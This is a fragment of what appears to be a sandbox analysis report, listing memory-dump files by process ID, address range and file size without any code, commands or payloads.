memory/1780-142-0x0000000000000000-mapping.dmp
-
memory/1780-183-0x00000000010E2000-0x00000000010E3000-memory.dmpFilesize
4KB
-
memory/1780-342-0x00000000076E0000-0x00000000076E1000-memory.dmpFilesize
4KB
-
memory/1780-182-0x00000000010E0000-0x00000000010E1000-memory.dmpFilesize
4KB
-
memory/1780-195-0x0000000007C10000-0x0000000007C11000-memory.dmpFilesize
4KB
-
memory/1780-246-0x0000000008BD0000-0x0000000008BD1000-memory.dmpFilesize
4KB
-
memory/1780-251-0x0000000008D20000-0x0000000008D21000-memory.dmpFilesize
4KB
-
memory/1780-252-0x0000000008F40000-0x0000000008F41000-memory.dmpFilesize
4KB
-
memory/1780-279-0x000000007F210000-0x000000007F211000-memory.dmpFilesize
4KB
-
memory/1780-280-0x00000000010E3000-0x00000000010E4000-memory.dmpFilesize
4KB
-
memory/1780-172-0x0000000007360000-0x0000000007361000-memory.dmpFilesize
4KB
-
memory/1784-135-0x0000000000000000-mapping.dmp
-
memory/1816-194-0x0000000000000000-mapping.dmp
-
memory/1828-357-0x0000000007910000-0x0000000007911000-memory.dmpFilesize
4KB
-
memory/1908-131-0x00000000007A0000-0x00000000007A1000-memory.dmpFilesize
4KB
-
memory/1908-128-0x0000000000000000-mapping.dmp
-
memory/1956-290-0x0000000000000000-mapping.dmp
-
memory/2032-163-0x0000000000000000-mapping.dmp
-
memory/2032-139-0x0000000000000000-mapping.dmp
-
memory/2080-350-0x0000000140000000-0x000000014038E000-memory.dmpFilesize
3.6MB
-
memory/2084-181-0x0000000000000000-mapping.dmp
-
memory/2196-348-0x0000000005500000-0x0000000005501000-memory.dmpFilesize
4KB
-
memory/2196-159-0x0000000000000000-mapping.dmp
-
memory/2216-143-0x0000000000000000-mapping.dmp
-
memory/2216-302-0x0000000000000000-mapping.dmp
-
memory/2216-307-0x000000001C830000-0x000000001C832000-memory.dmpFilesize
8KB
-
memory/2220-297-0x0000000000BA0000-0x0000000000BA1000-memory.dmpFilesize
4KB
-
memory/2220-160-0x0000000000000000-mapping.dmp
-
memory/2220-298-0x0000000005380000-0x0000000005986000-memory.dmpFilesize
6.0MB
-
memory/2220-295-0x0000000000416256-mapping.dmp
-
memory/2220-296-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/2232-306-0x0000000000000000-mapping.dmp
-
memory/2256-308-0x0000000000000000-mapping.dmp
-
memory/2256-317-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/2296-157-0x0000000000000000-mapping.dmp
-
memory/2316-154-0x0000000000000000-mapping.dmp
-
memory/2316-361-0x0000000006F10000-0x0000000006F11000-memory.dmpFilesize
4KB
-
memory/2512-334-0x00000000076C0000-0x00000000076C1000-memory.dmpFilesize
4KB
-
memory/2512-203-0x0000000000000000-mapping.dmp
-
memory/2564-199-0x0000000000000000-mapping.dmp
-
memory/2600-137-0x0000000000000000-mapping.dmp
-
memory/2600-161-0x0000000000000000-mapping.dmp
-
memory/2700-347-0x0000000007080000-0x0000000007081000-memory.dmpFilesize
4KB
-
memory/2720-321-0x0000000007920000-0x0000000007921000-memory.dmpFilesize
4KB
-
memory/2744-145-0x0000000000000000-mapping.dmp
-
memory/3112-355-0x0000000006A30000-0x0000000006A31000-memory.dmpFilesize
4KB
-
memory/3348-345-0x0000000006C90000-0x0000000006C91000-memory.dmpFilesize
4KB
-
memory/3476-339-0x0000000006BE0000-0x0000000006BE1000-memory.dmpFilesize
4KB
-
memory/3488-354-0x00000000072E0000-0x00000000072E1000-memory.dmpFilesize
4KB
-
memory/3608-149-0x0000000000000000-mapping.dmp
-
memory/3620-358-0x0000000007880000-0x0000000007881000-memory.dmpFilesize
4KB
-
memory/3636-356-0x0000000006BD0000-0x0000000006BD1000-memory.dmpFilesize
4KB
-
memory/3656-340-0x00000000074E0000-0x00000000074E1000-memory.dmpFilesize
4KB
-
memory/3660-331-0x000000001C6D0000-0x000000001C6D2000-memory.dmpFilesize
8KB
-
memory/3664-127-0x0000000000000000-mapping.dmp
-
memory/3672-287-0x0000000004E23000-0x0000000004E24000-memory.dmpFilesize
4KB
-
memory/3672-215-0x0000000000000000-mapping.dmp
-
memory/3672-281-0x0000000000000000-mapping.dmp
-
memory/3672-284-0x0000000004E20000-0x0000000004E21000-memory.dmpFilesize
4KB
-
memory/3672-285-0x0000000004E22000-0x0000000004E23000-memory.dmpFilesize
4KB
-
memory/3672-286-0x000000007F0B0000-0x000000007F0B1000-memory.dmpFilesize
4KB
-
memory/3688-148-0x0000000000000000-mapping.dmp
-
memory/3708-351-0x0000000007960000-0x0000000007961000-memory.dmpFilesize
4KB
-
memory/3708-337-0x0000000007AF0000-0x0000000007AF1000-memory.dmpFilesize
4KB
-
memory/3724-311-0x0000000000000000-mapping.dmp
-
memory/3724-318-0x0000000002140000-0x0000000002141000-memory.dmpFilesize
4KB
-
memory/3756-162-0x0000000000000000-mapping.dmp
-
memory/3756-138-0x0000000000000000-mapping.dmp
-
memory/3760-146-0x0000000000000000-mapping.dmp
-
memory/3772-359-0x0000000007A40000-0x0000000007A41000-memory.dmpFilesize
4KB
-
memory/3776-341-0x0000000005480000-0x0000000005481000-memory.dmpFilesize
4KB
-
memory/3780-190-0x0000000000000000-mapping.dmp
-
memory/3784-136-0x0000000000000000-mapping.dmp
-
memory/3808-228-0x00000000007A1000-0x000000000089D000-memory.dmpFilesize
1008KB
-
memory/3808-288-0x0000000000BB0000-0x0000000000BB7000-memory.dmpFilesize
28KB
-
memory/3808-225-0x0000000000000000-mapping.dmp
-
memory/3808-227-0x00000000007A0000-0x00000000008F3000-memory.dmpFilesize
1.3MB
-
memory/3808-233-0x0000000000BA0000-0x0000000000BA1000-memory.dmpFilesize
4KB
-
memory/3880-158-0x0000000000000000-mapping.dmp
-
memory/3892-207-0x0000000000000000-mapping.dmp
-
memory/3892-140-0x0000000000000000-mapping.dmp
-
memory/3892-164-0x0000000000000000-mapping.dmp
-
memory/3896-211-0x0000000000000000-mapping.dmp
-
memory/3896-144-0x0000000000000000-mapping.dmp
-
memory/3924-175-0x0000000000000000-mapping.dmp
-
memory/4040-151-0x0000000000000000-mapping.dmp
-
memory/4040-219-0x0000000000000000-mapping.dmp
-
memory/4052-353-0x0000000007510000-0x0000000007511000-memory.dmpFilesize
4KB
-
memory/4092-346-0x0000000004C40000-0x0000000004C41000-memory.dmpFilesize
4KB
-
memory/4092-313-0x0000000000000000-mapping.dmp
-
memory/4092-319-0x0000000000B70000-0x0000000000B72000-memory.dmpFilesize
8KB